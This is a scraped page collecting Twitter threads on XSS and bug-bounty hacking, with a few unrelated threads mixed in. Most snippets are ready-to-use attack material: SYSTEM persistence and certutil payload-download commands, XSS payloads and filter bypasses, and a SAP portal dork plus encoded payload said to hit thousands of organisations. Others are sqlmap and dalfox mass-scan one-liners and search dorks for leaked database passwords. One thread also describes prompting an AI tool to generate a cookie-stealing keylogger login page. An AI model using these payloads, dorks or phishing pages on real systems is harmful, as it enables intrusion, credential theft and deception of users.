Discover and read the best of Twitter Threads about #XSS

Most recent (18)

schtasks /create /tn "Task Name" /tr "C:\path\to\program.exe" /sc onstart /ru SYSTEM
DOWNLOAD A PAYLOAD

certutil -urlcache -split -f "example.com/file.exe" C:\path\to\save\file.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
Read 38 tweets
XSS PoC - AI Generated:

1. platform.openai.com/codex-javascri…
2. Prompt w/ description
3. Export to JSFiddle
4. Host it
5. Include external script
6. Escalate your alert()

#bugbountytips #infosec #xss #ai #GPT

👇🧵 for Prompt & Code
My prompt:
make a fake login page that's a keylogger and grabs cookies with some styling to make it look like a real login page
XSS PoC JS
Read 6 tweets
Introduction to #XSS

Learn the basics of Cross-Site Scripting (XSS)

Thread🧵👇

#bugbounty #bugbountytips #bugbountytip #cybersecurity #cybersecuritytips #infosec #infosecurity #hacking
Let's inspect the name first:

The Scripting part indicates, obviously, scripting, so we can think about what kind of scripting we know exists in Web Apps: HTML & JavaScript being the 2 most common.

Secondly, XSS is part of the INJECTION bug class (see @owasp's Top 10)
So, we now know XSS consists of injecting scripts in websites.

Types of XSS:

1. Reflected
2. Stored
3. DOM-based
They can also be Blind (you don't see the reflection)

As this thread is aimed at beginners, I will focus on the first 2 as they're easier to understand at first
Read 12 tweets
Another new idea for #PenetrationTesting and #Bug-hunting:

Tester:
Enhance the force of #vulnerabilities by doing things like
I discovered a free #URL that leads somewhere else.
Put this in my report and move on?
To the contrary, changing the #payload allowed me to transform it into a reflected #XSS #vulnerability. Is this the final question?
Obviously not if I have any hope of carrying on.
This web app used #JWT tokens that were transmitted in the bearer header, and for some reason, there were three more cookies that also contained this token.
Only two of them were secure with #HTTP Only.
Just a wild guess.
Read 5 tweets
Bug Testing Methodology Series:

๐—๐’๐’ (๐‚๐ซ๐จ๐ฌ๐ฌ ๐’๐ข๐ญ๐ž ๐’๐œ๐ซ๐ข๐ฉ๐ญ๐ข๐ง๐ )

Learn how to test for #XSS step by step on real #bugbounty programs.

Thread🧵👇

#cybersecurity #cybersecuritytips #infosec #hacking #bugbountytips #infosecurity
Before we start, it should be mentioned that this thread will only focus on the testing methodology of XSS, not teaching how it works.

If you don't already know what XSS is, check this out ➡️ portswigger.net/web-security/c…
1️⃣ Look for reflections

This is the first step in finding XSS.

Anywhere you see user input is reflected in the response (not limited to what you see on the page, it could be in source code/HTTP response only), note the location/parameter down, that's a potential attack vector.
Read 10 tweets
#learn365 - Day 32

10 XSS payloads that don't need parentheses 😄

#xss #bugbountytips
1. alert`1`

Use backquotes.
2.
window.name="javascript:alert(2)";
location="xss.html";

location=name
Read 11 tweets
If you want to Learn Hacking & Penetration Testing for FREE, read this:
โƒ Metasploit Unleashed

- Free Offensive Security Metasploit course.
- The Metasploit Unleashed (MSFU) course is provided
free of charge by Offensive Security.

๐Ÿ”—
offensive-security.com/metasploit-unlโ€ฆ
โƒ MITRE ATT&CKยฎ

- #MITRE's Adversarial Tactics, Techniques & Common
Knowledge (ATT&CK) - Curated knowledge base and
model for cyber adversary behavior.

๐Ÿ”—
attack.mitre.org/resources/gettโ€ฆ
Read 8 tweets
How I single-handedly bypassed #OpenSea's backend security model for profit. 🧵 👇

tl;dr code at github.com/cawfree/opense…
For some background, I've been trying to code the upper hand on #NFT marketplaces for a couple of years now:

github.com/cawfree/opense…
github.com/cawfree/opense…

These are some projects that made it, but there's a mountain of failed attempts that lay hidden behind the scenes.
I would scrape OpenSea's webpages and extract meaningful content from them.

Since most of the content is lazy-loaded via infinite scrolling, I'd use #puppeteer to scroll through the pages for me.

github.com/puppeteer/pupp…
Read 25 tweets
Another month has passed so we're back with the most watched #Angular #meetups from June.

Dive right into internationalization, inject services, smart apps, libraries, providers and much more. Extend your knowledge with the highest-rated #techtalks.

blog.meetupfeed.io/angular-tech-t…
Introduction to Internationalization in Angular via @marktechson

Mark Thompson covers in 15 minutes how to internationalize and localize an #application in #Angular to do exactly what you wish for!

meetupfeed.io/talk/introduct…
New Way to Inject Services in #Angular 14 via @DecodedFrontend
Let's have a look at some base use cases.

meetupfeed.io/talk/new-way-t…
Read 8 tweets
Find an easy #XSS that is found all over the internet.
Dork: inurl:"/irj/portal/" > visit the target, remove "/irj/portal/" from the URL & add the payload in the 2nd tweet. There are thousands of huge orgs with this #XSS, I reported > 150. Thank me later. #BugBountyTips #infosec
/SAPIrExtHelp/random/"><SVG ONLOAD%3d%26%2397%26%23108%26%23101%26%23114%26%23116(%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x64%26%23x6f%26%23x6d%26%23x61%26%23x69%26%23x6e)>.asp

#SAP
Eg: http://target[.]com/SAPIrExtHelp/random/"><SVG ONLOAD%3d%26%2397%26%23108%26%23101%26%23114%26%23116(%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x64%26%23x6f%26%23x6d%26%23x61%26%23x69%26%23x6e)>.asp if vulnerable boom =>XSS.
Read 5 tweets
#Secret2
Bug Bounty with One-Line Bash Scripts💵😎

You can mention your favorite script. I will add them to this thread.
#BugBounty #BugBountyTip
#100BugBountySecrets
🧵👇🏻
1/ #Secret2

🎯 Hunt #XSS:
👉🏻 cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
👉🏻 cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

#BugBounty #BugBountyTip
#100BugBountySecrets
🧵👇🏻
2/ #Secret2

🎯 Hunt #SQLi:
👉🏻 httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'

#BugBounty #BugBountyTip
#100BugBountySecrets
🧵👇🏻
Read 13 tweets
This thread brings together all my #infographics until today (2years of work).

These are all infographics about #infosec 🔐

Feel free to share this tweet if you think it may be useful for your #community 📚

Follow me ➡ @SecurityGuill for more about #security #hacking #news
How does an #Antivirus work?
Quick presentation of the different #Bluetooth Hacking Techniques
Read 44 tweets
Preventing Cross-Site Request Forgery (CSRF) attacks - auth0.com/blog/cross-sit…

#security #websecurity #sec #infosec
What is Cross-Site Request Forgery?

It is a type of attack performed on web apps in order to carry out a malicious action without the user's explicit consent.
These 'malicious actions' could be anything, for example: changing email address, personal information, etc.

#websecurity
How is it performed?

* attacker leads the user to perform an action (through email, website, etc.)

* attacker makes a request on behalf of the user (by using a hidden form, for example)

* vulnerable website sees it as a genuine action (by verifying session cookie)

#CodeNewbie
Read 8 tweets
Let's use this tweet to publish #Dorks of all kinds, let's start with this one:

inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner -foro -forum -topic -blog -about -docs -articles

#CyberSecurity #dork #BugBounty
intext:"pass" ! "usuario" | "user" | "contraseña" filetype:sql -github
This one is very good, it lets us do uploads; it has been tested with .jpeg images

intitle:"FCKeditor - Uploaders Tests"
Read 63 tweets
Gonna start a series of tweets about current bypasses in #XSS Auditor, 1 per day.

Bypassing Auditor dramatically increases the success of an XSS attack and the impact of such flaws, affecting users of the following major browsers:

Chrome, Opera and Safari.

Stay tuned! 😎
#XSS Auditor Bypass #1

The easiest one, HTMLi breaking out from script block (it must land where JS syntax is not affected though).

</script><svg><script>alert(1)%0A-->

brutelogic.com.br/xss.php?c1=%3C…

Notice the source code becomes red flagged (sign of Auditor) but it still executes.
#XSS Auditor Bypass #2

In reflections of URL where payload can be included on its path (like in PHP_SELF vulnerability or friendly URLs).

<link rel=import href='.&#47"><svg%20onload=alert(domain)>'>

brutelogic.com.br/xss.php/%22%3E…

Support to link imports will end soon though.
Read 8 tweets
1. I'm tweeting a lot these last days, let me make a quick recap
2. @Gioneeglobal, a Chinese phone maker who sells its phones in the US under the name @BLU_Product, made a phone for #NorthKorea. Afaik, they didn't make a public statement.

3. @OnePlus removed the #angela backdoor I found last November from its products

Read 18 tweets